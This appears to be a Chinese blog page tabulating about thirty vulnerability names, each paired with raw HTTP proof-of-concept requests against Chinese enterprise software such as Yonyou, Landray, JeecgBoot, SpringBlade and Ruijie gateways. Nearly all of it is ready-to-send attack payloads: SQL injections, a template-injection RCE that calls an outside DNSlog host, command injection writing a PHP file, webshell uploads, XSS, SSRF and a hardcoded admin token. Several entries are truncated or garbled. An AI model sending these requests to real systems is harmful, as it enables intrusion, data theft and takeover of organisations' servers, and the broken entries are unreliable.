| 用友U8 Cloud linkntb存在SQL注入漏洞 | GET /yer/html/nodes/linkntb/linkntb.jsp?pageId=linkntb&billId=1%27%29+AND+5846%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%285846%3D5846%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%29–+Astq&djdl=1&rand=1 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Connection: close Cookie: JSESSIONID=FC1C64E67AE8D02989467988D2FF143A.server; JSESSIONID=5BA15086E03362F38918286E9E0C0E24.server Upgrade-Insecure-Requests: 1 Priority: u=1 |
| 蓝凌EIS智慧协同平台ShowUserInfo.aspx SQL注入 | GET /third/DingTalk/Demo/ShowUserInfo.aspx?account=1’%20and%201=@@version–+ HTTP/1.1 Host: x Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close |
| 蓝凌EIS智慧协同平台frm_form_list_main.aspx SQL注入 | GET /frm/frm_form_list_main.aspx?list_id=1%20and%201=@@version–+ HTTP/1.1 Host: x Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close |
| 蓝凌EIS智慧协同平台fl_define_flow_chart_show.aspx SQL注入 | GET /flow/fl_define_flow_chart_show.aspx?id=1%20and%201=@@version–+ HTTP/1.1 Host: x Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close |
| 蓝凌EIS智慧协同平台UniformEntry.aspx SQL注入 | GET /third/DingTalk/Pages/UniformEntry.aspx?moduleid=1%20and%201=@@version–+ HTTP/1.1 Host: xxxx Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close |
| 蓝凌EIS智慧协同平台doc_fileedit_word.aspx SQL注入 | GET /dossier/doc_fileedit_word.aspx?recordid=1’%20and%201=@@version– +&edittype=1,1 HTTP/1.1 Host: xxxx Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close |
| 蓝凌EIS智慧协同平台frm_button_func.aspx SQL注入 | GET /frm/frm_button_func.aspx?formid=1%20and%201=@@version–+ HTTP/1.1 Host: xxxx Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close |
| 铭飞MCMS 远程代码执行漏洞 | POST /static/plugins/ueditor/1.4.3.3/jsp/editor.do?jsonConfig=%7b%76%69%64%65%6f%55%72%6c%50%72%65%66%69%78%3a%27%27%2c%66%69%6c%65%4d%61%6e%61%67%65%72%4c%69%73%74%50%61%74%68%3a%27%27%2c%69%6d%61%67%65%4d%61%78%53%69%7a%65%3a%32%30%34%38%30%30%30%30%30%2c%76%69%64%65%6f%4d%61%78%53%69%7a%65%3a%32%30%34%38%30%30%30%30%30%2c%66%69%6c%65%4d%61%78%53%69%7a%65%3a%32%30%34%38%30%30%30%30%30%2c%66%69%6c%65%55%72%6c%50%72%65%66%69%78%3a%27%27%2c%69%6d%61%67%65%55%72%6c%50%72%65%66%69%78%3a%27%27%2c%69%6d%61%67%65%50%61%74%68%46%6f%72%6d%61%74%3a%27%2f%7b%5c%75%30%30%32%45%5c%75%30%30%32%45%5c%75%30%30%32%46%7d%7b%74%65%6d%70%6c%61%74%65%2f%31%2f%64%65%66%61%75%6c%74%2f%7d%7b%74%69%6d%65%7d%27%2c%66%69%6c%65%50%61%74%68%46%6f%72%6d%61%74%3a%27%2f%75%70%6c%6f%61%64%2f%31%2f%63%6d%73%2f%63%6f%6e%74%65%6e%74%2f%65%64%69%74%6f%72%2f%7b%74%69%6d%65%7d%27%2c%76%69%64%65%6f%50%61%74%68%46%6f%72%6d%61%74%3a%27%2f%75%70%6c%6f%61%64%2f%31%2f%63%6d%73%2f%63%6f%6e%74%65%6e%74%2f%65%64%69%74%6f%72%2f%7b%74%69%6d%65%7d%27%2c%22%69%6d%61%67%65%41%6c%6c%6f%77%46%69%6c%65%73%22%3a%5b%22%2e%70%6e%67%22%2c%20%22%2e%6a%70%67%22%2c%20%22%2e%6a%70%65%67%22%2c%20%22%2e%6a%73%70%78%22%2c%20%22%2e%6a%73%70%22%2c%22%2e%68%74%6d%22%5d%7d%0a&action=uploadimage HTTP/1.1 Accept: */* Host: Accept-Encoding: gzip, deflate Connection: close Content-Type: multipart/form-data; boundary=————————–583450229485407027180070 Content-Length: 278 —————————-583450229485407027180070 <#assign ex=”freemarker.template.utility.Execute”?new()> ${ ex(“ping xudzooqzos.dgrh3.cn”) } |
| JeecgBoot反射型XSS漏洞 | GET /userController.do?%3CsCrIpT%3Ealert(document.domain)%3C/sCrIpT%3E HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Macintosh; Intel MacOS X 10.15; rv:126.0) Gecko/20100101Firefox/126.0 |
| RAISECOM网关设备list_base_config.php存在远程命令执行漏洞 | GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Finfo.php%60 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 |
| SpringBlade系统menu接口存在SQL注入漏洞 | GET /api/blade-system/menu/list?updatexml(1,concat(0x7e,md5(1),0x7e),1)=1 HTTP/1.1 Host: User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0 Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ Connection: close |
| eking管理易FileUpload接口存在任意文件上传漏洞 | POST /app/FileUpload.ihtm?comm_type=EKING&file_name=../../rce.jsp. HTTP/1.1 Host: User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Content-Type: multipart/form-data; boundary=WebKitFormBoundaryHHaZAYecVOf5sfa6 –WebKitFormBoundaryHHaZAYecVOf5sfa6 <% out.println(“hello”);%> |
| 拓尔思TRS媒资管理系统uploadThumb存在文件上传漏洞 | POST /mas/servlets/uploadThumb?appKey=sv&uploadingId=asd HTTP/1.1 Accept: */* Content-Type: multipart/form-data; boundary=—-WebKitFormBoundarySl8siBbmVicABvTX Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 ——WebKitFormBoundarySl8siBbmVicABvTX Content-Disposition: form-data; name=”file”; filename=”%2e%2e%2fwebapps%2fmas%2fa%2etxt” Content-Type: application/octet-stream 1234 ——WebKitFormBoundarySl8siBbmVicABvTX– |
| 杭州雄威餐厅数字化综合管理平台存在存在绕过认证导致任意密码重置漏洞 | 重置密码处,改回包中的code字段为1 |
| 泛微ecology系统setup接口存在信息泄露漏洞 | GET /cloudstore/ecode/setup/ecology_dev.zip HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 |
| 用友U9系统DoQuery接口存在SQL注入 | POST /U9C/CS/Office/TransWebService.asmx HTTP/1.1 Host: Content-Type: text/xml; charset=utf-8 Content-Length: 309 SOAPAction: “http://tempuri.org/GetEnterprise” <?xml version=”1.0″ encoding=”utf-8″?> POST /U9C/CS/Office/TransWebService.asmx HTTP/1.1 <?xml version=”1.0″ encoding=”utf-8″?> POST /U9C/CS/Office/TransWebService.asmx HTTP/1.1 <?xml version=”1.0″ encoding=”utf-8″?> |
| 用友时空KSOA系统接口PrintZP.jsp存在SQL注入漏洞 | GET /kp/PrintZP.jsp?zpfbbh=1%27+IF(LEN(db_name())>4)+WAITFOR+DELAY+%270:0:2%27+–+ HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 Connection: close |
| 用友时空KSOA系统接口PrintZPFB.jsp存在SQL注入漏洞 | GET /kp/PrintZPFB.jsp?zpfbbh=1%27+union+select+1,2,3,4,db_name()+–+ HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 Connection: close |
| 用友时空KSOA系统接口PrintZPYG.jsp存在SQL注入漏洞 | GET /kp/PrintZPYG.jsp?zpjhid=1%27+union+select+1,2,db_name(),4,5,6,7,8,9,10,11,12,13,14+–+ HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 Connec |
| 用友时空KSOA系统接口PrintZPZP.jsp存在SQL注入漏洞 | GET /kp/PrintZPZP.jsp?zpshqid=1%27+union+select+1,2,db_name(),4,5,6,7,8,9,10,11,12,13+–+ HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 Connection: close |
| 用友时空KSOA系统接口fillKP.jsp存在SQL注入漏洞 | GET /kp/fillKP.jsp?kp_djbh=1%27+IF(LEN(db_name())>4)+WAITFOR%20DELAY%20%270:0:2%27+–+ HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 Connection: close |
| 用友畅捷通-TPlus系统接口ajaxpro存在ssrf漏洞 | POST /tplus/ajaxpro/Ufida.T.SM.UIP.UA.AddressSettingController,Ufida.T.SM.UIP.ashx?method=TestConnnect HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: ASP.NET_SessionId=sfzg0pgxvld3ltgimecqkjg4; Hm_lvt_fd4ca40261bc424e2d120b806d985a14=1721822405; Hm_lpvt_fd4ca40261bc424e2d120b806d985a14=1721822415; HMACCOUNT=AFE08148BD092161 Upgrade-Insecure-Requests: 1 Priority: u=0, i Content-Type: application/x-www-form-urlencoded Content-Length: 36 { |
| 积木报表JeecgBoot被爆存在.net反序列化RCE 0day漏洞 | /jeecg-boot/jmreport/save?previousPage=xxx&jmLink=YWFhfHxiYmI= |
| 方天云智慧平台系统 GetCustomerLinkman SQL注入漏洞 | POST /WXAPI.asmx/GetCustomerLinkman HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 Content-Type: application/json {clmID:”1 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL– QurA”} |
| 方天云智慧平台系统 Upload.ashx 任意文件上传漏洞 | POST /Upload.ashx HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 Content-Type: multipart/form-data; boundary=—-WebKitFormBoundarySl8siBbmVicABvTX Connection: close ——WebKitFormBoundarySl8siBbmVicABvTX <%@Page Language=”C#”%><%Response.Write(“hello”);System.IO.File.Delete(Request.PhysicalPath);%> |
| 积木报表JeecgBoot存在SQL注入 | POST /jeecg-boot/jmreport/queryFieldBySql?previousPage=xxx&jmLink=YWFhfHxiYmI=&token=123123 HTTP/1.1 Host: 192.168.131.100:8088 User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html) Accept: */* Accept-Language: zh-CN,zh;q=0.9 Connection: keep-alive Content-Type: application/json Cache-Control: no-cache Pragma: no-cache Content-Length: 21 {“sql”:”select ‘1’ “} |
| 万户ezOFFICE协同管理平台 getAutoCode SQL注入漏洞 | GET /defaultroot/platform/custom/customizecenter/js/getAutoCode.jsp;.js? pageId=1&head=2%27+AND+6205%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2898%29%7C%7CCHR%2866%29%7C%7CCHR %2890%29%7C%7CCHR%28108%29%2C5%29–+YJdO&field=field_name&tabName=tfield HTTP/1.1 Host: Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36 |
| 蓝凌 EKP sys-common远程代码执行0day漏洞 | POST /ekp/data/sys-common/dataxml.tmpl HTTP/1.1 Host: x.x.x.x:x User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 192 s_bean=ruleFormulaValidate&script=try { |
| 锐捷-EG易网关存在RCE漏洞 | 获取用户密码 POST /login.php HTTP/1.1 Host: 10.10.10.10 User-Agent: Go-http-client/1.1 Content-Length: 49 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Accept-Encoding: gzip username=admin&password=admin?show+webmaster+user 命令执行 notdelay=true&command=ls |
© 版权声明
THE END
喜欢就支持一下吧
暂无评论内容